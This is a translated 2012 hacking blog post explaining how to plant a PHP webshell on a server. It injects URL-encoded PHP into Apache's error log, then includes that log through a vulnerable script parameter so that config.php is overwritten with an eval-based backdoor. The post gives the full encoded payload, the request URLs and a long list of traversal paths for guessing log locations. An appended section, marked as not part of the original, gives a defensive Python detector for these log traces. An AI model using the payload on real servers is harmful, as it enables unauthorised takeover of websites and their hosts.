
Writing a webshell by including the Apache log from PHP

Posted on 2012-9-15 14:27:40
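Because the method above is not very practical (in my tests I found that logs are routinely tens of megabytes, which takes the fun out of it), let's take the idea a step further and write a genuinely usable webshell, which is also far better than the painfully slow approach above.

For example, take the same one-line backdoor again:
<?eval($_POST[cmd]);?>

At this point you may already have realised that this is a pretty good approach. Read on: the question now is how to write it. Use the following:
Open the file /home/virtual/www.xxx.com/forum/config.php with fopen, then write the one-line backdoor server-side statement <?eval($_POST[cmd]);?> into it. Put together as a PHP statement, that is:
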
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
fclose($fp);?>   //writes the one-line backdoor statement into config.php

We submit this statement so that Apache records it in the error log, then include the log, and the shell is written. Remember that it must be converted to URL-encoded form for this to work.
Converted, it becomes:
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
fclose%28%24fp%29%3B%3F%3E
We submit:
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

The error log now contains this line of code that writes the webshell.
Next we include the log by submitting:
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

The webshell has now been written: config.php contains the one-line backdoor statement.
OK.
http://www.xxx.com/forum/config.php has now become our webshell.
Connect to it directly with lanker's client and the host is yours.

PS: Everything above presupposes that the folder is writable; the permissions must be -rwxrwxrwx (777) before you can continue. Check this with the directory listing shown above. Everything above also assumes that the log path is known.

For other log paths, you can guess, or refer to the list here.
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/error_log
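The two traces this technique leaves in Apache logs, seen from the defender's side, as an added example that is not part of the original post: a PHP open tag recorded in a log line (URL-encoded in access_log, decoded in error_log), and a request parameter whose value names a server log file. The sample log lines, the 192.0.2.x addresses and the signal names are constructed for illustration; `z.php` and `zizzy` are the names used in the post.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[0-9.]+"')     # request field of an access_log line
LOG_FILE = re.compile(r"(?:access|error)[._]log", re.I)  # parameter value names a server log
PHP_TAG = "<?"                                           # short or long PHP open tag


def fully_decode(text, rounds=3):
    """Undo URL encoding repeatedly so double-encoded input is also caught."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def findings(line):
    """Return the sorted signals found in one access_log or error_log line."""
    hits = set()
    if PHP_TAG in fully_decode(line):
        hits.add("php-tag-logged")
    match = REQUEST.search(line)
    if match:
        query = urlsplit(match.group(1)).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            if LOG_FILE.search(fully_decode(value)):
                hits.add("log-file-in-parameter:" + name)
    return sorted(hits)


def scan(lines):
    """Map 1-based line number -> findings for every line with at least one signal."""
    return {n: f for n, line in enumerate(lines, 1) if (f := findings(line))}


# Constructed sample lines (not from the original post); the PHP tag is a harmless marker.
SAMPLE = [
    '192.0.2.7 - - [15/Sep/2012:14:20:01 +0800] "GET /%3C%3Fphp%20echo%201%3B%3F%3E HTTP/1.1" 404 209',
    '[Sat Sep 15 14:20:01 2012] [error] [client 192.0.2.7] File does not exist: /var/www/<?php echo 1;?>',
    '192.0.2.7 - - [15/Sep/2012:14:21:10 +0800] "GET /z.php?zizzy=..%2F..%2Flogs%2Fwww-error_log HTTP/1.1" 200 5120',
    '192.0.2.9 - - [15/Sep/2012:14:22:00 +0800] "GET /forum/index.php?page=2 HTTP/1.1" 200 8841',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE).items():
        print(number, hits)
```

A 200 response to a request flagged `log-file-in-parameter`, following a `php-tag-logged` hit from the same client, is the sequence to escalate; either signal alone already warrants a look at the script that takes the parameter.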